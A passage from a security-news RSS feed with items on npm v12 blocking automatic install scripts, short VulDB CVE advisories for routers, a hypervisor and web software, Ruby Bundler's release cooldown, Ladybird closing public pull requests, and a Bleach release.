<p><strong>“</strong>It’s not easy being the stewards of the largest package repository in the world. Community consensus on what security capabilities should be standard, and when it’s okay to make breaking changes shifts over time. From our continual conversations with the community, it was clear it was time to make this change,” Steindler said. </p>



<p>“The recent attacks are alarming,” he noted, “but stewarding these package repositories is a multi-decade effort, not just a moment in time. As attacks evolve, so will our defensive security capabilities. We’re in this for the long haul.”</p>



<p>Gogia said that the change, although overdue, is a good one. </p>



<p>“Npm is removing one of the most comfortable hiding places for software supply chain risk: code that executes the moment a developer types install,” Gogia said. “With npm v12, execution becomes something that must be approved, recorded in the project, and committed for review. That is not a design adjustment. It is a change in control philosophy.”</p>



<h2 class="wp-block-heading">Bad defaults become infrastructure</h2>



<p>Gogia had his own take on why GitHub waited so long.</p>



<p>“Npm waited because its risky default acquired a constituency. As far back as 2016, npm’s own position was that the convenience of install scripts outweighed the worm risk, with an opt-out flag for the cautious. The trade-off was a documented product decision, not an oversight,” he said. </p>



<p>“The trouble with bad defaults is that they become infrastructure,” he added. “Native module builds, browser installers such as Playwright and Cypress, Electron download flows and Husky hooks all grew around automatic execution. Turning it off became less a technical adjustment and more a constitutional reform.”</p>



<h2 class="wp-block-heading">Liability changed hands</h2>



<p>The real pressure for the change, however, came from regulators.</p>



<p>“The deeper answer is that the liability changed hands. Once regulation such as the EU Cyber Resilience Act and securities disclosure rules placed supply chain failure on corporate balance sheets, a documented unsafe default became indefensible,” Gogia said. </p>



<p>Kapoor agreed that long-used procedures enabled this security hole to survive longer than it should have. </p>



<p>“The reason this likely was not done long ago is compatibility,” he said. “Install scripts are not only used by attackers. Many legitimate packages use them to compile native modules, download platform-specific binaries, generate files, or complete setup steps. Changing the default breaks assumptions that have existed in the npm ecosystem for years. That is why these security changes often arrive slowly. The safer default is obvious from a security perspective, but painful from an ecosystem compatibility perspective.”</p>



<p>In addition, he noted, “the bigger point is that package managers are moving from implicit trust to explicit trust. That is the right direction. Developers should have to approve which dependencies are allowed to execute code during install. But approval cannot become a blind checkbox. Teams need visibility into which package wants to run a script, whether it is direct or transitive, why it is there, and whether it belongs in the project at all.”</p>



<p>Kapoor added that this change matters because install-time execution often happens in privileged environments with access to tokens, secrets, internal registries, build artifacts, or deployment paths. “Even if the script does not compromise production directly, it may be able to steal enough context to support the next stage of an attack,” he said.</p>



<h2 class="wp-block-heading">Value in the pain</h2>



<p>Cybersecurity consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="noreferrer noopener">Brian Levine</a>, executive director of FormerGov, agreed that the closing of this security hole is a very good thing. </p>



<p>“It seems like virtually every major supply chain attack of the last decade has had the same original sin: code that ran automatically because the ecosystem let it. Npm finally closing that door by default is overdue, but it’s genuinely significant. This is the package manager for hundreds of billions of downloads a month,” Levine said. </p>



<p>“When npm changes its defaults, it changes the security posture of practically every enterprise dev environment on the planet. It may have been the last large code repository to still allow this kind of automated execution.”</p>



<p>Levine added that this change might not merely stop a security hole, but the new process may meaningfully improve security. </p>



<p>“There’s actually something valuable buried in this migration pain. Having developers explicitly approve which packages can run code and commit that list to source control is a form of software supply chain governance that many organizations never had,” Levine said. “It creates an auditable record which is meaningful, especially for regulated industries.”</p>



<p><em>This article originally appeared on <a href="https://www.infoworld.com/article/4183849/github-finally-pulls-the-plug-on-automatic-install-script-execution-for-npm.html" target="_blank">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Der Hardest Fork: Warum KI den Open-Source-Software-Sicherheitsbetrieb neu erfordert]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – KI-gestützte Sicherheitsforschung entdeckt nicht nur mehr Schwachstellen, sondern kombiniert sie auch schneller zu gefährlichen Kettenangriffen. Der CEO von Chainguard fordert deshalb ein Umdenken beim Open-Source-Software-Sicherheitsbetrieb: Statt sich allein auf das klass...]]></description>
<link>https://tsecurity.de/de/3586677/it-security-nachrichten/der-hardest-fork-warum-ki-den-open-source-software-sicherheitsbetrieb-neu-erfordert/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3586677/it-security-nachrichten/der-hardest-fork-warum-ki-den-open-source-software-sicherheitsbetrieb-neu-erfordert/</guid>
<pubDate>Wed, 10 Jun 2026 08:43:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-hardest-fork-open-source-security-1.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-hardest-fork-open-source-security-1.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-hardest-fork-open-source-security-1-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-hardest-fork-open-source-security-1-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-hardest-fork-open-source-security-1-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-hardest-fork-open-source-security-1-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-hardest-fork-open-source-security-1-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – KI-gestützte Sicherheitsforschung entdeckt nicht nur mehr Schwachstellen, sondern kombiniert sie auch schneller zu gefährlichen Kettenangriffen. Der CEO von Chainguard fordert deshalb ein Umdenken beim Open-Source-Software-Sicherheitsbetrieb: Statt sich allein auf das klassische, koordinierte Disclosure zu verlassen, müsse die Branche eine skalierbare Infrastruktur für „Maintainer of Last Resort“ und kuratierte Forks aufbauen. Im […]</p>
<div><a href="https://www.it-boltwise.de/der-hardest-fork-warum-ki-den-open-source-software-sicherheitsbetrieb-neu-erfordert.html">... den vollständigen Artikel <strong>»Der Hardest Fork: Warum KI den Open-Source-Software-Sicherheitsbetrieb neu erfordert«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/der-hardest-fork-warum-ki-den-open-source-software-sicherheitsbetrieb-neu-erfordert.html">Der Hardest Fork: Warum KI den Open-Source-Software-Sicherheitsbetrieb neu erfordert</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10047 | Bitdefender Napoca bare-metal hypervisor 519 Real-mode Hook napoca/kernel/handler.c out-of-bounds write]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in Bitdefender Napoca bare-metal hypervisor 519. Impacted is an unknown function of the file napoca/kernel/handler.c of the component Real-mode Hook Handler. Performing a manipulation results in out-of-bounds write. This vulnerabil...]]></description>
<link>https://tsecurity.de/de/3583025/sicherheitsluecken/cve-2026-10047-bitdefender-napoca-bare-metal-hypervisor-519-real-mode-hook-napocakernelhandlerc-out-of-bounds-write/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583025/sicherheitsluecken/cve-2026-10047-bitdefender-napoca-bare-metal-hypervisor-519-real-mode-hook-napocakernelhandlerc-out-of-bounds-write/</guid>
<pubDate>Mon, 08 Jun 2026 23:54:19 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/bitdefender:napoca_bare-metal_hypervisor">Bitdefender Napoca bare-metal hypervisor 519</a>. Impacted is an unknown function of the file <em>napoca/kernel/handler.c</em> of the component <em>Real-mode Hook Handler</em>. Performing a manipulation results in out-of-bounds write. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-10047">CVE-2026-10047</a>. The attack requires a local approach. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10046 | Bitdefender Napoca bare-metal hypervisor Malicious Guest Operatingreal Mode bios_handlers.c out-of-bounds write]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Bitdefender Napoca bare-metal hypervisor. The affected element is an unknown function of the file napoca/guests/bios_handlers.c of the component Malicious Guest Operatingreal Mode. Executing a manipulation can lead to out-of-bounds w...]]></description>
<link>https://tsecurity.de/de/3582875/sicherheitsluecken/cve-2026-10046-bitdefender-napoca-bare-metal-hypervisor-malicious-guest-operatingreal-mode-bioshandlersc-out-of-bounds-write/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582875/sicherheitsluecken/cve-2026-10046-bitdefender-napoca-bare-metal-hypervisor-malicious-guest-operatingreal-mode-bioshandlersc-out-of-bounds-write/</guid>
<pubDate>Mon, 08 Jun 2026 22:53:02 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/bitdefender:napoca_bare-metal_hypervisor">Bitdefender Napoca bare-metal hypervisor</a>. The affected element is an unknown function of the file <em>napoca/guests/bios_handlers.c</em> of the component <em>Malicious Guest Operatingreal Mode</em>. Executing a manipulation can lead to out-of-bounds write. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2026-10046">CVE-2026-10046</a>. The attack requires local access. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-11511 | Bolt CMS up to 3.7.5 HTML Attribute TextType.php style HTML injection (EUVD-2026-35059)]]></title>
<description><![CDATA[A vulnerability was found in Bolt CMS up to 3.7.5. It has been declared as problematic. This vulnerability affects unknown code of the file src/Storage/Field/Type/TextType.php of the component HTML Attribute Handler. Executing a manipulation of the argument style can lead to HTML injection. This ...]]></description>
<link>https://tsecurity.de/de/3581956/sicherheitsluecken/cve-2026-11511-bolt-cms-up-to-375-html-attribute-texttypephp-style-html-injection-euvd-2026-35059/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581956/sicherheitsluecken/cve-2026-11511-bolt-cms-up-to-375-html-attribute-texttypephp-style-html-injection-euvd-2026-35059/</guid>
<pubDate>Mon, 08 Jun 2026 17:51:40 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/bolt:cms">Bolt CMS up to 3.7.5</a>. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. This vulnerability affects unknown code of the file <em>src/Storage/Field/Type/TextType.php</em> of the component <em>HTML Attribute Handler</em>. Executing a manipulation of the argument <em>style</em> can lead to HTML injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-11511">CVE-2026-11511</a>. It is possible to launch the attack remotely. Furthermore, an exploit is available.

The GitHub repository was archived by the owner and is now read-only.]]></content:encoded>
</item>
<item>
<title><![CDATA[Ruby Fights Supply-Chain Attacks With Filter Offering 'Cooldown' Before Installing New Packages]]></title>
<description><![CDATA[Most supply-chain attacks using Ruby's package hosting site "exploit a narrow window," according to a new blog post form Ruby core maintainer Hiroshi Shibata. 

So its packaging-managing Bundler tool now offers a filter that blocks new version until it's been public "for at least N days. Releases...]]></description>
<link>https://tsecurity.de/de/3581342/it-security-nachrichten/ruby-fights-supply-chain-attacks-with-filter-offering-cooldown-before-installing-new-packages/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581342/it-security-nachrichten/ruby-fights-supply-chain-attacks-with-filter-offering-cooldown-before-installing-new-packages/</guid>
<pubDate>Mon, 08 Jun 2026 13:53:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Most supply-chain attacks using Ruby's package hosting site "exploit a narrow window," according to a new blog post form Ruby core maintainer Hiroshi Shibata. 

So its packaging-managing Bundler tool now offers a filter that blocks new version until it's been public "for at least N days. Releases too new to have been scrutinized are passed over in favor of ones that have aged past the window."

The feature was designed in the open, drawing on how other ecosystems approach the same problem. It is opt-in, and complements rather than replaces existing defenses like mandatory 2FA and trusted publishing... Cooldown is unset by default, so a project without it keeps resolving to the newest versions.... Passing 0 disables cooldown for the run... 

Cooldown is most useful as one part of the wider security investment happening on rubygems.org. The registry now validates gem contents at push time and checks logins against Have I Been Pwned so that compromised passwords cannot be reused, work described in Protecting rubygems.org from the outside in. A dedicated team is running AI-assisted vulnerability scanning against the most critical gems, backed by Alpha Omega and Anthropic, and the direction of all of this is tracked on a public roadmap. Trusted publishing and mandatory 2FA already raise the bar for who can push a release in the first place.
<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Ruby+Fights+Supply-Chain+Attacks+With+Filter+Offering+'Cooldown'+Before+Installing+New+Packages%3A+https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F06%2F08%2F0511207%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F06%2F08%2F0511207%2Fruby-fights-supply-chain-attacks-with-filter-offering-cooldown-before-installing-new-packages%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://developers.slashdot.org/story/26/06/08/0511207/ruby-fights-supply-chain-attacks-with-filter-offering-cooldown-before-installing-new-packages?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-11460 | Boost Serialization up to 1.91 improper validation of specified type of input (Issue 331 / EUVD-2026-34991)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in Boost Serialization up to 1.91. The impacted element is an unknown function. This manipulation causes improper validation of specified type of input.

The identification of this vulnerability is CVE-2026-11460. It is possible to initiate the...]]></description>
<link>https://tsecurity.de/de/3580075/sicherheitsluecken/cve-2026-11460-boost-serialization-up-to-191-improper-validation-of-specified-type-of-input-issue-331-euvd-2026-34991/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580075/sicherheitsluecken/cve-2026-11460-boost-serialization-up-to-191-improper-validation-of-specified-type-of-input-issue-331-euvd-2026-34991/</guid>
<pubDate>Sun, 07 Jun 2026 23:38:05 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/boost:serialization">Boost Serialization up to 1.91</a>. The impacted element is an unknown function. This manipulation causes improper validation of specified type of input.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-11460">CVE-2026-11460</a>. It is possible to initiate the attack remotely. Furthermore, there is an exploit available.

The maintainer was notified on Aug 2025 and a disclosure deadline was set for 90 days. The maintainer acknowledged but postponed indefinitely citing time concerns. No patch is currently available and the disclosure deadline has expired.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10064 | TRENDnet TEW-432BRP 3.10B20 /goform/formSetPortTr special_name stack-based overflow]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in TRENDnet TEW-432BRP 3.10B20. This affects the function formSetPortTr of the file /goform/formSetPortTr. Performing a manipulation of the argument special_name results in stack-based buffer overflow. This vulnerability only affects products ...]]></description>
<link>https://tsecurity.de/de/3578773/sicherheitsluecken/cve-2026-10064-trendnet-tew-432brp-310b20-goformformsetporttr-specialname-stack-based-overflow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578773/sicherheitsluecken/cve-2026-10064-trendnet-tew-432brp-310b20-goformformsetporttr-specialname-stack-based-overflow/</guid>
<pubDate>Sun, 07 Jun 2026 06:07:53 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/trendnet:tew-432brp">TRENDnet TEW-432BRP 3.10B20</a>. This affects the function <code>formSetPortTr</code> of the file <em>/goform/formSetPortTr</em>. Performing a manipulation of the argument <em>special_name</em> results in stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2026-10064">CVE-2026-10064</a>. It is possible to initiate the attack remotely. Furthermore, there is an exploit available.

The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10061 | TRENDnet TEW-432BRP 3.10B20 /goform/formWPS peerPin command injection]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in TRENDnet TEW-432BRP 3.10B20. Affected is the function formWPS of the file /goform/formWPS. The manipulation of the argument peerPin results in command injection. This vulnerability only affects products that are no longer supported by the main...]]></description>
<link>https://tsecurity.de/de/3578771/sicherheitsluecken/cve-2026-10061-trendnet-tew-432brp-310b20-goformformwps-peerpin-command-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578771/sicherheitsluecken/cve-2026-10061-trendnet-tew-432brp-310b20-goformformwps-peerpin-command-injection/</guid>
<pubDate>Sun, 07 Jun 2026 06:07:50 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/trendnet:tew-432brp">TRENDnet TEW-432BRP 3.10B20</a>. Affected is the function <code>formWPS</code> of the file <em>/goform/formWPS</em>. The manipulation of the argument <em>peerPin</em> results in command injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2026-10061">CVE-2026-10061</a>. The attack can be executed remotely. Additionally, an exploit exists.

The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10063 | TRENDnet TEW-432BRP 3.10B20 /goform/formWPS peerPin stack-based overflow]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in TRENDnet TEW-432BRP 3.10B20. Affected by this issue is the function formWPS of the file /goform/formWPS. Such manipulation of the argument peerPin leads to stack-based buffer overflow. This vulnerability only affects products that are n...]]></description>
<link>https://tsecurity.de/de/3578769/sicherheitsluecken/cve-2026-10063-trendnet-tew-432brp-310b20-goformformwps-peerpin-stack-based-overflow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578769/sicherheitsluecken/cve-2026-10063-trendnet-tew-432brp-310b20-goformformwps-peerpin-stack-based-overflow/</guid>
<pubDate>Sun, 07 Jun 2026 06:07:47 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/trendnet:tew-432brp">TRENDnet TEW-432BRP 3.10B20</a>. Affected by this issue is the function <code>formWPS</code> of the file <em>/goform/formWPS</em>. Such manipulation of the argument <em>peerPin</em> leads to stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2026-10063">CVE-2026-10063</a>. The attack may be performed from remote. In addition, an exploit is available.

The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10062 | TRENDnet TEW-432BRP 3.10B20 /goform/formSetRoute ip/mask/gateway stack-based overflow]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in TRENDnet TEW-432BRP 3.10B20. Affected by this vulnerability is the function formSetRoute of the file /goform/formSetRoute. This manipulation of the argument ip/mask/gateway causes stack-based buffer overflow. This vulnerability only affects ...]]></description>
<link>https://tsecurity.de/de/3578767/sicherheitsluecken/cve-2026-10062-trendnet-tew-432brp-310b20-goformformsetroute-ipmaskgateway-stack-based-overflow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578767/sicherheitsluecken/cve-2026-10062-trendnet-tew-432brp-310b20-goformformsetroute-ipmaskgateway-stack-based-overflow/</guid>
<pubDate>Sun, 07 Jun 2026 06:07:45 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/trendnet:tew-432brp">TRENDnet TEW-432BRP 3.10B20</a>. Affected by this vulnerability is the function <code>formSetRoute</code> of the file <em>/goform/formSetRoute</em>. This manipulation of the argument <em>ip/mask/gateway</em> causes stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2026-10062">CVE-2026-10062</a>. The attack is possible to be carried out remotely. Moreover, an exploit is present.

The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10060 | TRENDnet TEW-432BRP 3.10B20 /goform/formSetRoute ip/mask/gateway command injection]]></title>
<description><![CDATA[A vulnerability identified as critical has been detected in TRENDnet TEW-432BRP 3.10B20. This impacts the function formSetRoute of the file /goform/formSetRoute. The manipulation of the argument ip/mask/gateway leads to command injection. This vulnerability only affects products that are no longe...]]></description>
<link>https://tsecurity.de/de/3578765/sicherheitsluecken/cve-2026-10060-trendnet-tew-432brp-310b20-goformformsetroute-ipmaskgateway-command-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578765/sicherheitsluecken/cve-2026-10060-trendnet-tew-432brp-310b20-goformformsetroute-ipmaskgateway-command-injection/</guid>
<pubDate>Sun, 07 Jun 2026 06:07:42 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">critical</a> has been detected in <a href="https://vuldb.com/product/trendnet:tew-432brp">TRENDnet TEW-432BRP 3.10B20</a>. This impacts the function <code>formSetRoute</code> of the file <em>/goform/formSetRoute</em>. The manipulation of the argument <em>ip/mask/gateway</em> leads to command injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-10060">CVE-2026-10060</a>. Remote exploitation of the attack is possible. Furthermore, an exploit is available.

The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities."]]></content:encoded>
</item>
<item>
<title><![CDATA[Ladybird Browser Stops Accepting Public Pull Requests]]></title>
<description><![CDATA[The Ladybird browser isn't opposed to AI coding tools, but it's just brought a new change to their code-contributing policies. 

February 23: "Ladybird adopts Rust, with help from AI."
I used Claude Code and Codex for the translation. This was human-directed, not autonomous code generation. I dec...]]></description>
<link>https://tsecurity.de/de/3578371/it-security-nachrichten/ladybird-browser-stops-accepting-public-pull-requests/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578371/it-security-nachrichten/ladybird-browser-stops-accepting-public-pull-requests/</guid>
<pubDate>Sat, 06 Jun 2026 22:51:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Ladybird browser isn't opposed to AI coding tools, but it's just brought a new change to their code-contributing policies. 

February 23: "Ladybird adopts Rust, with help from AI."
I used Claude Code and Codex for the translation. This was human-directed, not autonomous code generation. I decided what to port, in what order, and what the Rust code should look like. It was hundreds of small prompts, steering the agents where things needed to go... The requirement from the start was byte-for-byte identical output from both pipelines. The result was about 25,000 lines of Rust, and the entire port took about two weeks. The same work would have taken me multiple months to do by hand. 

June 5 (Friday):

We will no longer accept public pull requests... A pull request no longer tells us as much as it used to about the person submitting it. A substantial patch used to imply substantial effort, and that effort was a reasonable proxy for good faith. That assumption no longer holds.... 

We have already seen patient, well-resourced campaigns in open source to earn maintainer trust and abuse it. What has changed is how much faster and cheaper it has become to produce work that looks like a serious contribution... Whether code was typed by hand is beside the point. What matters is who is responsible for it once it enters the browser. Ladybird is becoming a browser for real users. The people introducing changes to it must be the people who decide those changes belong in the project, and who will answer for the consequences. 
As part of this change, we will close all currently open public pull requests. We are grateful for the work people put into them, but keeping the existing queue open would keep that contribution path open in practice. There is no perfect time to make this change, so we are making it now. Going forward, pull requests will only be available to project maintainers. There will not be a separate process for submitting patches by other means. We do not want to create a shadow contribution system through issues, comments, email, or forks... 

Outside involvement still matters: clear bug reports, reductions, website testing, standards discussion, design discussion, security reports, and technical feedback all help move the project forward. This is the right change for Ladybird now. We are preparing to ship a browser to real users, and our development process has to match that responsibility.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Ladybird+Browser+Stops+Accepting+Public+Pull+Requests%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F06%2F06%2F2025214%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F06%2F06%2F2025214%2Fladybird-browser-stops-accepting-public-pull-requests%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/06/06/2025214/ladybird-browser-stops-accepting-public-pull-requests?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-10437 | Eksagate Webpack Management System up to 20251119 sql injection]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in Eksagate Webpack Management System up to 20251119. This issue affects some unknown processing. Such manipulation leads to sql injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerabili...]]></description>
<link>https://tsecurity.de/de/3577726/sicherheitsluecken/cve-2025-10437-eksagate-webpack-management-system-up-to-20251119-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3577726/sicherheitsluecken/cve-2025-10437-eksagate-webpack-management-system-up-to-20251119-sql-injection/</guid>
<pubDate>Sat, 06 Jun 2026 14:53:40 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/eksagate:webpack_management_system">Eksagate Webpack Management System up to 20251119</a>. This issue affects some unknown processing. Such manipulation leads to sql injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2025-10437">CVE-2025-10437</a>. It is possible to launch the attack remotely. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-0987 | CB Project CVLand up to 20251103 allows authorization (EUVD-2025-37480)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in CB Project CVLand up to 20251103. The affected element is an unknown function. This manipulation of the argument allows causes authorization bypass. This vulnerability only affects products that are no longer supported by the ma...]]></description>
<link>https://tsecurity.de/de/3577662/sicherheitsluecken/cve-2025-0987-cb-project-cvland-up-to-20251103-allows-authorization-euvd-2025-37480/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3577662/sicherheitsluecken/cve-2025-0987-cb-project-cvland-up-to-20251103-allows-authorization-euvd-2025-37480/</guid>
<pubDate>Sat, 06 Jun 2026 14:08:43 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/cb_project:cvland">CB Project CVLand up to 20251103</a>. The affected element is an unknown function. This manipulation of the argument <em>allows</em> causes authorization bypass. This vulnerability only affects products that are no longer supported by the maintainer.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2025-0987">CVE-2025-0987</a>. It is possible to initiate the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Will Kahn-Greene: Bleach 6.4.0 releases -- final release]]></title>
<description><![CDATA[What is it?
Bleach is a Python library for sanitizing
and linkifying text from untrusted sources for safe usage in HTML.


Bleach v6.4.0 released!
Bleach 6.4.0 includes two security fixes, a fix to tinycss2 dependency
requirements, and some other things.
See the changes here:
https://bleach.readt...]]></description>
<link>https://tsecurity.de/de/3575588/tools/will-kahn-greene-bleach-640-releases-final-release/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575588/tools/will-kahn-greene-bleach-640-releases-final-release/</guid>
<pubDate>Fri, 05 Jun 2026 16:10:40 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<section>
<h3>What is it?</h3>
<p><a class="reference external" href="https://bleach.readthedocs.io/">Bleach</a> is a Python library for sanitizing
and linkifying text from untrusted sources for safe usage in HTML.</p>
</section>
<section>
<h3>Bleach v6.4.0 released!</h3>
<p>Bleach 6.4.0 includes two security fixes, a fix to tinycss2 dependency
requirements, and some other things.</p>
<p>See the changes here:</p>
